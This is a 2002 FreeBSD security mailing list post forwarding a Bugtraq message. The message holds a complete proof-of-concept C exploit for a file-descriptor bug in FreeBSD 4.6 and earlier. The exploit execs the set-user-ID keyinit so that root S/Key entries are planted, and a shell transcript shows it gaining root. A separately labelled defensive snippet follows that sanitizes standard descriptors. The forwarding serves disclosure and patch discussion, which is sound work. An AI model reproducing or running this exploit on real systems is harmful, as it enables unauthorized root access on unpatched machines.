From owner-freebsd-security Mon Aug 19 16:09:49 2002
Date: Mon, 19 Aug 2002 19:06:09 -0400
From: Mike Tancsa <mike@sentex.net>
To: security@freebsd.org
Subject: Fwd: Freebsd FD exploit

From bugtraq, for those of you not on bugtraq. I take it this was addressed in FreeBSD-SA-02:23.stdio?

        ---Mike

>From: "dvdman"
>Subject: Freebsd FD exploit
>Date: Sun, 18 Aug 2002 21:01:13 -0400

[Attachment: text/plain]

/* Proof Of Concept exploit for the FreeBSD file descriptors bug. FreeBSD
   thought they fixed this months ago; well, guess again :P Thanks to the
   FreeBSD kernel you may now enjoy local root on all FreeBSD <=4.6 ;) */

/* *I AM FREE* *I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE**I AM FREE* */

/*
   DVDMAN (DVDMAN@L33TSECURITY.COM)
   Visit Us: irc.efnet.org #l33tsecurity  www.l33tsecurity.com
   And FreeBSD thought they fixed this :P

   GREETS:
     thanks phased for skeys from iosmash.c :)
     thanks all of #l33tsecurity for support
     thanks Georgi Guninski for ideas

   Details:
   Several months ago Joost Pol made public almost the same problem.
   FreeBSD fixed it, but the patch does not cover all the cases. In some
   cases the kernel closes fds 0..2 after they are assigned to /dev/null,
   leaving the system open to an attack. If a +s file is execed and fds
   0..2 are opened to /proc/curproc/{special}, then the kernel forcefully
   closes them and open() then reuses them.

   This program makes the following skeys valid:
     95: CARE LIVE CARD LOFT CHIC HILL
     96: TESS OIL WELD DUD MUTE KIT
     97: DADE BED DRY JAW GRAB NOV
     98: MASS OAT ROLL TOOL AGO CAM
     99: DARK LEW JOLT JIVE MOS WHO

   PROOF:
   [dvdman@xxxx:~]$ uname -a
   FreeBSD xxx.xx 4.6-STABLE FreeBSD 4.6-STABLE #1: Sat Jul27 20:16:20 GMT 2002 dvdman@xxxx:/usr/obj/usr/src/sys/xxx i386
   [dvdman@xxxx:~]$ gcc iosmash2.c
   [dvdman@xxxx:~]$ ./a.out
   Adding dvdman:
   ctrl-c
   [dvdman@xxxx:~]$ su
   s/key 98 snosoft2
   Password:
   [root@xxxx:/home/dvdman]#
*/

/* Header names were stripped in the list archive copy; restored here from
   the calls the program makes. */
#include <errno.h>   /* errno */
#include <fcntl.h>   /* open(), O_WRONLY */
#include <stdio.h>   /* fprintf() */
#include <string.h>  /* strerror() */
#include <unistd.h>  /* dup(), close(), execl() */

int main(int argc, char *argv[])
{
    int f;
    int ret;

    /* Fill the descriptor table: duplicate fd 1 until dup() fails. */
    while (dup(1) != -1) {};

    /* Free fds 2 and 3 so that the next open() lands on fd 2 (stderr). */
    close(2);
    close(3);

    /* Put /proc/curproc/mem on fd 2; see "Details" above for what the
       kernel then does with it on a set-user-ID exec. */
    f = open("/proc/curproc/mem", O_WRONLY);
    if (f == -1)
        fprintf(stdout, "Error in open /proc\n");

    fprintf(stdout, "press ctrl-c when adding...");

    /* Exec the set-user-ID keyinit with a crafted argv[0]. */
    ret = execl("/usr/bin/keyinit",
                "\nroot 0099 snosoft2 6f648e8bd0e2988a Apr 23,2666 01:02:03\n",
                (char *)NULL);
    if (ret == -1) {
        fprintf(stdout, "execl() failed: %s (%d)\n", strerror(errno), errno);
    }
    return 0;
}

--------------------------------------------------------------------
Mike Tancsa, tel +1 519 651 3400
Sentex Communications, mike@sentex.net
Providing Internet since 1994 www.sentex.net
Cambridge, Ontario Canada www.sentex.net/mike
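Added example, not part of the posted exploit nor of FreeBSD's own code: the userland counterpart of the kernel-side fix discussed in the "Details" section. A set-user-ID program that repairs fds 0..2 itself at startup, and refuses any later open() that lands on a standard descriptor, is not exposed by the kernel closing those descriptors behind its back. The function names fd_is_open, sanitize_std_fds and open_not_std are my own.

```c
#include <errno.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <unistd.h>

/* Returns 1 if fd is open, 0 if it is closed, -1 on an unexpected error. */
int fd_is_open(int fd)
{
    struct stat st;
    if (fstat(fd, &st) == 0)
        return 1;
    return errno == EBADF ? 0 : -1;
}

/* Re-open every closed standard descriptor on /dev/null, before the program
 * opens anything sensitive. Returns the number of descriptors repaired, or
 * -1 if /dev/null could not be opened on the expected descriptor number.
 * Call this first thing in main() of a privileged program. */
int sanitize_std_fds(void)
{
    int repaired = 0;
    for (int fd = 0; fd <= 2; fd++) {
        int state = fd_is_open(fd);
        if (state == 1)
            continue;
        if (state < 0)
            return -1;
        /* open() returns the lowest free descriptor; with fds below this
         * one already open, that must be fd itself. */
        int nfd = open("/dev/null", fd == 0 ? O_RDONLY : O_WRONLY);
        if (nfd < 0)
            return -1;
        if (nfd != fd) {
            close(nfd);
            return -1;
        }
        repaired++;
    }
    return repaired;
}

/* Belt and braces: open path but refuse a descriptor in 0..2, since that
 * only happens when a standard descriptor was closed without our knowledge
 * and a diagnostic written to stdout/stderr would end up in the file. */
int open_not_std(const char *path, int flags, mode_t mode)
{
    int fd = open(path, flags, mode);
    if (fd >= 0 && fd <= 2) {
        close(fd);
        errno = EBADF;
        return -1;
    }
    return fd;
}
```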